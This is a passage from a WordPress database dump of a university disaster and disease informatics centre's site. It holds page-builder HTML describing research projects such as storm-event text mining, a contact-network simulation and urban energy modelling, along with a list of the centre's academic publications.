gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\r\n <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\r\n <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-350 style-local-126-c12\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">GSU Contact Network Prediction</h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, and hybrid is similar to our approach to\r\n this research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\r\n to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\r\n account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\r\n to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\r\n <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-356 style-local-126-c17\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\r\n documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\r\n of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\r\n two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\r\n <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\r\n <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\r\n <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-364 style-local-126-c24\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">The DICE Data Repository </h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\r\n of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\r\n ontology will define semantics associated with adverse events & corresponding response and recovery efforts. \r\n <br>\r\n </p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\r\n <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-384 style-local-126-c29\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">Orpheus</h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\r\n the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\r\n can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\r\n <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\r\n <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\r\n <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-392 style-local-126-c36\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">Urban Scale Energy Assessments</h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\r\n in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\r\n of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\r\n patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\r\n propose a plan for grid distribution optimized for human-centric usage and need.</p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:19:53','2023-09-29 14:19:53','',126,'https://gsudice.dataconn.net/?p=1427',0,'revision','',0),(1428,1,'2023-09-29 10:20:16','2023-09-29 14:20:16','<div data-colibri-id=\"608-c1\" class=\"style-413 style-local-608-c1 position-relative\">\r\n <!---->\r\n <div data-colibri-component=\"section\" data-colibri-id=\"608-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-417 style-local-608-c2 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-boxed-container\">\r\n <!---->\r\n <div data-colibri-id=\"608-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-418 style-local-608-c3 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-419-outer style-local-608-c4-outer\">\r\n <div data-colibri-id=\"608-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-419 style-local-608-c4 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"608-c5\" class=\"h-text h-text-component style-420 style-local-608-c5 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p><strong>2022</strong></p>\r\n <p>Atkinson, S. F., Kala, A. K., & Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).</p>\r\n <p>Angelique B.Willis, Mildred Addo, Lauren E.Yoder, Cassandra K. Johnson, Sydney L. Resler, Leticia J. Young, Elizabeth Armstrong-Mensah(2022). Individual and Community Level Factors Related to Sanitation, Water Quality, Treatment and\r\n Management in Rural Communities in Accra, Ghana: A Field Study Report.</p>\r\n <p><strong>2021</strong></p>\r\n <p>Northeim, K., Tiwari, C., & Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science & Policy, 126, 48-59.</p>\r\n <p>Gwalani, H., Tiwari, C., & Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.</p>\r\n <p>Torres, A. V., Tiwari, C., & Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.</p>\r\n <p>Northeim, K., Marks, C., & Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.</p>\r\n <p>Haynes, D., & Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.</p>\r\n <p>Oppong, J., & Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.</p>\r\n <p>O’Neill, M., Poole, M., & Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.</p>\r\n <p>Irany, F. A., Iyer, A., Flores, R. B., & Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.</p>\r\n <p>Qian, W., Bhowmick, S., O’Neill, M., Ramisetty-Mikler, S., & Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.</p>\r\n <p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., & Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure Computing.</p>\r\n <p>Huang, Y., Cai, Z., Pang, J., Xie, Z., & Bourgeois, A. G. (2021, June). Game Theory Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications\r\n (pp. 1-6). IEEE.</p>\r\n <p>Rosen, A., Levin, B., & Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW)\r\n (pp. 631-640). IEEE.</p>\r\n <p>Tharpe, B., Bourgeois, A. G., & Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services\r\n (pp. 505-506).</p>\r\n <p>Huang, Y., Li, W., Wang, J., Cai, Z., & Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. Journal of Network and Computer Applications, 191, 103115.</p>\r\n <p>Sidharthan, S., Ashok, A., & Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students\r\n (S3) Workshop (pp. 1-2).</p>\r\n <p>Younis, A. A., Sunderraman, R., Metzler, M., & Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\r\n <p>Ye, H., Yang, X., Takac, M., Sunderraman, R., & Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.</p>\r\n <p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., & Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.</p>\r\n <p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., & Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence & Computing, Advanced & Trusted\r\n Computing, Scalable Computing & Communications, Internet of People and Smart City Innovation (SmartWorld/SCALCOM/UIC/ATC/IOP/SCI) (pp. 295-302). IEEE.</p>\r\n <p>Younis, A. A., Sunderraman, R., Metzler, M., & Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\r\n <p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., Sunderraman, R., & Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication\r\n Systems & NETworkS (COMSNETS) (pp. 19-24). IEEE.</p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n</div>','Publications','','inherit','closed','closed','','608-revision-v1','','','2023-09-29 10:20:16','2023-09-29 14:20:16','',608,'https://gsudice.dataconn.net/?p=1428',0,'revision','',0),(1429,1,'2023-09-29 10:23:19','2023-09-29 14:23:19','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":336,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c5\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":337,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":335,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c7\",\"parentId\":\"20-c6\",\"partialId\":20,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"20-c7\",\"index\":0,\"id\":\"20-c8\",\"partialId\":20,\"styleRef\":334,\"type\":\"content\",\"props\":{\"content\":\"Focus Areas<br>\"}}],\"styleRef\":333,\"type\":\"content\"}],\"id\":\"20-c6\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":331,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c10\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c10\",\"index\":0,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c12\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease & disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c14\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c14\",\"index\":0,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c16\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c17\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c18\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c18\",\"index\":0,\"id\":\"20-c19\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c20\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"Impact assessment<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c21\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c9\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2023-09-29 10:23:19','2023-09-29 14:23:19','',168,'https://gsudice.dataconn.net/?p=1429',0,'revision','',0),(1430,1,'2023-09-29 10:23:19','2023-09-29 14:23:19','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-335 style-local-20-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-336-outer style-local-20-c4-outer\">\n <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-336 style-local-20-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-337-outer style-local-20-c5-outer\">\n <div data-colibri-id=\"20-c5\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-337 style-local-20-c5 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"20-c6\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-331 style-local-20-c6 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-333-outer style-local-20-c7-outer\">\n <div data-colibri-id=\"20-c7\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-333 style-local-20-c7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c8\" class=\"h-global-transition-all h-heading style-334 style-local-20-c8 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-334 